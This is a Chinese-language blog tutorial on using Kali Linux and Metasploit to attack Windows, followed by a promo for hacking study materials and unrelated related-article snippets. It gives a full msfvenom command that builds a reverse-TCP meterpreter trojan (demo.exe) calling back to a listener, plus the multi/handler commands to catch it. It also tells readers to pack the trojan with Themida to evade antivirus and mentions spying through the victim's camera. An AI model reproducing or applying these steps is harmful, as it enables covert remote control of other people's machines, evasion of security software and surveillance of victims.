网络攻防——kali操作系统基本使用

1.阅读前的声明

本文章中生成的木马带有一定的攻击性,使用时请遵守网络安全相关的法律法规(恶意攻击操作系统属于违法行为)。

2.环境安装

生成木马主要需要如下工具:kali操作系统,VMware15(搭建kali操作系统环境,防止影响自己的windows系统的正常运行),Themida(免杀加壳工具,防止被电脑或者手机的安全工具查杀)。

2.1VMware15的下载

VMware15的下载安装,可以参考这个文章:VMware15的下载安装教程

2.2kali操作系统的下载与虚拟机创建

kali操作系统的下载链接:kali操作系统下载,我们选择VMware,右边的是mac电脑的。
在这里插入图片描述
    迅雷好像快一些,当时使用迅雷加速了一下,下载完成之后的文件如下:
在这里插入图片描述
    需要注意的是这里下载的就是一个虚拟机,直接再VMware里面打开就行了(是打开!),不是镜像文件哦,安装成功结果如下:
在这里插入图片描述

2.3 Themida的下载安装

Themida的下载安装可以参考这篇文章:Themida的下载
    注:可能你觉得我需要安装教程一步步来说明,卸载环境重装环境,但是这样工作量太大了,可能会占用一些不要的时间,天天教安装也没啥意思,但需要明白一点,装环境是开发很重要的一步,也是入门的最最基础的一步,如果环境不会装,多搜搜就会了,也不用急。

3.利用kali操作系统的metasploit攻击windows操作系统

正片开始,登录kali操作系统(默认账户名和密码都是:kali),打开终端,输入sudo su(切换到管理员身份,密码还是kali),如下所示:
在这里插入图片描述
接下来依次输入如下指令:

msfconsole init //(初始化metasploit数据库)

新开一个终端,输入ip address获取虚拟机的ip地址:
在这里插入图片描述
    接下来回到上一个终端,输入如下指令:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.58.128 lport=9999 -f exe -o demo.exe

注:-p表示攻击载荷,表示的是说明这个程序需要载入什么功能,这里就是windows/x64/meterpreter/reverse_tcp(开始操作系统的远程连接服务),后面的是远程连接的执行主机和该连接使用的端口,-f表示的生成的文件格式,-o表示的output(生成),demo.exe表示的是生成的文件名称。接下来就可以找到生成的木马程序了:
在这里插入图片描述
在这里插入图片描述
特别说明,可能你在这个地方没有看到生成的文件,这个是因为生成的文件可能在root目录下,有些时候也在kali目录下,所以如果没有的话,直接点击右键,open as Root
在这里插入图片描述

use exploit/multi/handler(使用exploit里面的处理程序模块)
set payload windows/x64/meterpreter/reverse_tcp(设置靶机中开启的服务)
set lhost 192.168.58.128(设置靶机中该服务权限的使用者)
set lport 9999(靶机中连接使用的端口)
run

程序需要等到靶机的执行即可。
接下来,将虚拟机中的demo.exe放入到windows中,但是,会立马被杀掉:
在这里插入图片描述
    但是对于一个程序而言,杀毒软件也同样是软件,有些软件不能被杀掉是因为有着特殊的加壳处理,保护了程序不被杀掉,常见的就比如Themida。
在这里插入图片描述
    恢复之后需要保证火绒依然能够识别该病毒:
在这里插入图片描述
在这里插入图片描述
    完成之后杀一下生成的保护文件:
在这里插入图片描述

接下来就是使用病毒程序了,windows执行病毒程序,然后

在这里插入图片描述
    如果给你拍个照或者视频录像,从事非法操作,当然我这里使用的是本机虚拟机,如果使用的是装了kali操作系统的服务器还是有点恐怖的。
    最后,对于英语困难户,可以看看这个汉化教程哦,亲测有效:(kali汉化教程)

👇👇👇

:黑客&网络安全的零基础攻防教程

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

在这里领取:

在这里插入图片描述

这个是我花了几天几夜自整理的最新最全网安学习资料包免费共享给你们,其中包含以下东西:

1.学习路线&职业规划

在这里插入图片描述
在这里插入图片描述

2.全套体系课&入门到精通

在这里插入图片描述

3.黑客电子书&面试资料

在这里插入图片描述

4.漏洞挖掘工具和学习文档

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/770188.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

用Python制作动态钟表:实时显示时间的动画

文章目录 引言准备工作前置条件 代码实现与解析导入必要的库初始化Pygame绘制钟表函数主循环 完整代码 引言 动态钟表是一种直观且实用的UI元素,能够实时显示当前时间。在这篇博客中,我们将使用Python创建一个动态钟表,通过利用Pygame库来实…

无线物联网题集

测试一 未来信息产业的发展在由信息网络向 全面感知和 智能应用两个方向拓展、延伸和突破。 各国均把 物联网作为未来信息化战略的重要内容,融合各种信息技术,突破互联网的限制,将物体接入信息网络。 计算机的出现,开始了第四次工业革命,开始了人机物的高度融合(&…

LVS负载均衡群集部署之——DR模式的介绍及搭建步骤

一、LVS-DR集群介绍1.1 LVS-DR 工作原理1.2 数据包流向分析1.3 LVS-DR 模式的特点1.4 LVS-DR中的ARP问题1.4.1 问题一1.4.2 问题二二、构建LVS-DR集群2.1 构建LVS-DR集群的步骤(理论)1.配置负载调度器(192.168.80.30)(…

护眼指南之适合学生写作业的台灯:看看学生护眼台灯哪个品牌好

随着人们健康意识的提高,越来越多的人开始关注眼睛的健康问题,照明技术的进步也为缓解眼疲劳提供了可能,现在的照明产品可以通过调整光线亮度、色温、频闪等参数,使光线更加柔和、均匀,减少眼睛的不适感。人们都希望通…

重生奇迹MU 最动听的声音 最精彩的游戏

在重生奇迹MU的世界里,每个玩家都是重生奇迹的见证者,同时也是重生奇迹的创造者。每个玩家都有属于自己的冒险故事,每时每刻都会有新的喜悦降临。这款神奇的游戏让人沉浸于冒险的精彩中,实在引人入胜。 “叮”的一声让你倍感喜悦…

<Linux> 多线程

文章目录 线程线程互斥锁死锁 线程同步生产者消费者模型POSIX信号量基于环形队列的生产消费模型 线程池 线程 线程是进程内部可以独立运行的最小单位 进程是资源分配的基本单位,线程是调度器调度的基本单位 线程在进程的地址空间内运行 进程内的大部分资源线程是…

LeetCode-刷题记录-滑动窗口合集(本篇blog会持续更新哦~)

一、滑动窗口概述 滑动窗口(Sliding Window)是一种用于解决数组(或字符串)中子数组(或子串)问题的有效算法。 Sliding Window核心思想: 滑动窗口技术的基本思想是维护一个窗口(一般…

RPC远程过程调用--Thrift

RPC远程过程调用–Thrift 简介 Thrift是一个由Facebook开发的轻量级、跨语言的远程服务调用框架,后进入Apache开源项目。支持通过自身接口定义语言IDL定义RPC接口和数据类型,然后通过编译器生成不同语言代码,用于构建抽象易用、可互操作的R…

JAVA+SSM+VUE《教学视频点播系统》

1管理员登录 管理员登录,通过填写用户名、密码、角色等信息,输入完成后选择登录即可进入视频点播系统,如图1所示。 图1管理员登录界面图 2管理员功能实现 2.1 修改密码 管理员对修改密码进行填写原密码、新密码、确认密码并进行删除、修改…

【Python机器学习】算法链与管道——在网格搜索中使用管道

在网格搜索中使用管道的工作原理与使用任何其他估计器都相同。 我们定义一个需要搜索的参数网络,并利用管道和参数网格构建一个GridSearchCV。不过在指定参数网格时存在一处细微的变化。我们需要为每个参数指定它在管道中所属的步骤。我们要调节的两个参数C和gamma…

监控与安全服务

kali 系统 nmap扫描 网段的扫描 使用脚本扫描 使用john破解密码 哈希算法是一种单向加密的算法,也就是将原始数据生成一串“乱码”只能通过原始数据,生成这串“乱码”,但是不能通过“乱码”回推出原始数据相同的原始数据,生成的乱…

红酒与时尚秀场:品味潮流新风尚

在时尚与品味的交汇点上,红酒总是以其不同的方式,为每一次的时尚盛宴增添一抹诱人的色彩。当红酒遇上时尚秀场,不仅是一场视觉的盛宴,更是一次心灵的触动。今天,就让我们一起走进红酒与时尚秀场的世界,感受…

Elasticsearch:结合稀疏、密集和地理字段

作者:来自 Elastic Madhusudhan Konda 如何以自定义方式组合多个稀疏、密集和地理字段 Elasticsearch 是一款强大的工具,可用于近乎实时地搜索和分析数据。作为开发人员,我们经常会遇到包含各种不同字段的数据集。有些字段是必填字段&#x…

算法力扣刷题记录 二十八【225. 用队列实现栈】

前言 栈和队列篇。 记录 二十八【225. 用队列实现栈】 一、题目阅读 请你仅使用两个队列实现一个后入先出(LIFO)的栈,并支持普通栈的全部四种操作(push、top、pop 和 empty)。 实现 MyStack 类: void p…

数据库安全审计系统:满足数据安全治理合规要求

伴随着数据库信息价值以及可访问性提升,使得数据库面对来自内部和外部的安全风险大大增加,如违规越权操作、恶意入侵导致机密信息窃取泄漏,但事后却无法有效追溯和审计。 国内专注于保密与非密领域的分级保护、等级保护、业务连续性安全和大数…

浅谈渗透测试实战

很多时候,在看白帽子们的漏洞的时候总有一种感觉就是把web渗透简单地理解成了发现web系统漏洞进而获取webshell。其实,个人感觉一个完整的渗透(从黑客的角度去思考问题)应该是以尽一切可能获取目标的系统或者服务器的最高权限&…

TCL中环可转债缩水近90亿:业绩持续承压,百亿自有资金购买理财

《港湾商业观察》廖紫雯 日前,TCL中环新能源科技股份有限公司(以下简称:TCL中环,002129.SZ)可转债总额缩水近90亿,引发市场关注。可转债大幅缩水的另一面,公司此前发布公告披露将使用百亿自有资…

深入详解RocketMQ源码安装与调试

1.源码下载 http://rocketmq.apache.org/dowloading/releases/ 2. 环境要求 64位系统JDK1.8(64位)Maven 3.2.x

[笔记] 卷积03 - 运算的对称性 时域构建高通滤波器的失败尝试

1.卷积运算具备足够好的对称性 1.在计算卷积时,两个函数的位置是可以颠倒的,对吧? 在卷积运算中,确实可以对参与卷积的两个函数进行颠倒。这是因为卷积的定义是通过一个函数与另一个函数的翻转后的形式进行积分运算。具体来说&a…

【系统架构设计师】计算机组成与体系结构 ⑨ ( 磁盘管理 | “ 磁盘 “ 单缓冲区 与 双缓冲区 | “ 磁盘 “ 单缓冲区 与 双缓冲区案例 )

文章目录 一、" 磁盘 " 单缓冲区 与 双缓冲区1、" 磁盘 " 单缓冲区2、" 磁盘 " 双缓冲区 二、" 磁盘 " 单缓冲区 与 双缓冲区案例1、案例描述2、磁盘单缓冲区 - 流水线分析3、磁盘双缓冲区 - 流水线分析 一、" 磁盘 " 单缓冲…